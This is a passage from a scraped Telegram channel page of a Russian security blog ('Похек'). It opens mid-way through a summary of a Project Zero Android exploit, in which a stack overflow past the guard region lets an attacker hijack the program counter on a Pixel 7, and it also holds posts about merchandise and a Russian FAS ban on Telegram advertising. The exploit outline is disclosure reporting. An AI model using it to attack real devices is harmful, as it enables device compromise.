▪️Далее триггерится функция с большим стековым фреймом (например цепочка incremental_service → isFileFullyLoaded → loadFrom()).
▪️Большая аллокация стека перепрыгивает guard region и перезаписывает сохраненный link register (LR) до его восстановления → происходит захват PC (часто наблюдается краш с PC = 0xaaaaaaaa).
▪️Эксплуатация повторяется до успеха (race condition, вероятность ~5–10% на попытку).

Вероятность успешной эксплуатации относительно низкая из-за рандомизации размещения стеков потоков и памяти.

Эксплойт из исследования подтвержден на конкретной сборке Pixel 7 (Android 16).

🔗 https://project-zero.issues.chromium.org/issues/465827985

🌚 | 📲 https://max.ru/poxek |🌚 https://blog.poxek.cc/ | 📺 https://www.youtube.com/@poxek_official/videos | 📺 https://rutube.ru/channel/38946414/ | 📺 https://vk.com/video/@poxek_official

Похек

24 мар. 2026 г., 12:32

Как только погода чуть более стабилизируется, я возобновлю продажи худи Похек. Цена останется та же, как в прошлом году )

Ближе к возобновлению продаж будет полноценный анонс

3,620

Похек

24 мар. 2026 г., 12:32

📷 Photo

Уважаемые читатели и подписчики,

Вчера многие из Вас уже видели информацию про запрет рекламы в Telegram со стороны ФАС. Чтобы не поддаваться эмоциям в моменте — обратился за комментарием по горячим следам в ФАС через официальную почту ведомства по поводу запрета рекламы в Telegram.

📲Получил официальный ответ от ФАС следующего содержания:

Добрый вечер!

Комментирует пресс-служба ФАС России:

ФАС России контролирует соблюдение рекламного законодательства.

В соответствии с ним (1) не допускается распространение рекламы на информационных ресурсах, деятельность которых признана нежелательной на территории Российской Федерации, а также доступ к которым ограничен (2).

В связи с принятием мер по ограничению доступа к социальным платформам Инстаграм и Фейсбук, видеохостингу Ютуб, ВПН-сервисам, ⬇️ мессенджерам Телеграм и Вотсап ФАС России усматривает в размещении рекламных интеграций на этих площадках признаки нарушения рекламного законодательства, ответственность (3) за которое несут как рекламодатель, так и рекламораспространитель.

В настоящее время при наличии оснований ведомство принимает предусмотренные законодательством меры реагирования.

Для приведения деятельности в соответствие с требованиями законодательства служба рекомендует участникам рынка провести анализ контента, размещаемого на информационных ресурсах, доступ к которым ограничен.

Подробнее о запрете распространения рекламы после 1 сентября 2025 года на определенных интернет-ресурсах можно узнать на сайте ( https://fas.gov.ru/documents/690033) ФАС России.

(1) ч. 10.7 ст. 5 Федерального закона от 13.03.2006 № 38-ФЗ «О рекламе».

(2) ст. 15.3 Федерального закона от 27.07.2006 № 149-ФЗ «Об информации, информационных технологиях и о защите информации».

(3) ст. 14.3 КоАП РФ.

С уважением,

ведущий консультант отдела пресс-службы УОС ФАС России [фамилия и имя сотрудника скрыты]
👆Исходя из вышесказанного, можно сделать вывод о том, что действительно теперь вся реклама в Telegram под запретом (Ютуб тоже). Не спасает ни erid, ни что-то другое. Из-за того, что применяется ограничение к Telegram, ФАС России усматривает в размещении рекламных интеграций на этих площадках признаки нарушения рекламного законодательства.

Штрафы для юридических лиц за подобные нарушения могут достигать ₽500 000 за каждый выявленный эпизод размещения.

Такие вот новости. Все запланированные посты на сегодня отменил. Возьму паузу.

*Meta (соцсети Facebook, Instagram) запрещена в РФ https://t.me/russian_osintкак 🏴‍☠️экстремистская.

✋ https://t.me/Russian_OSINT

Showing 22 of 22 posts

No more posts

Рейтинг

Требуется вход

Отзывы пользователей (0)

Пока нет отзывов. Будьте первым, кто поделится своим опытом!

Похек

Похек

Рейтинг

Рост участников (Последние 16 дней)

Последние посты

Рейтинг

Отзывы пользователей (0)

Похожие каналы Telegram

Кондиционеры | Вентиляция | Пермь | Climat59

Roses_are_rosie

Путь Дракона | Шанхай Дрэгонс

ЛюбаЕСТ 🍒💃🍫✨

ГОВОРИТ БЕЛГОРОД!

ОПТ ЦВЕТЫ ПЕРМЬ | РОМАНТИК

Улица (все серии)

ФУЛЛЫ ЕРШОВОЙ

Похожие каналы Telegram

Кондиционеры | Вентиляция | Пермь | Climat59

Roses_are_rosie

Путь Дракона | Шанхай Дрэгонс

ЛюбаЕСТ 🍒💃🍫✨

ГОВОРИТ БЕЛГОРОД!

ОПТ ЦВЕТЫ ПЕРМЬ | РОМАНТИК

Улица (все серии)

ФУЛЛЫ ЕРШОВОЙ

Отзывы пользователей (0)

Последние посты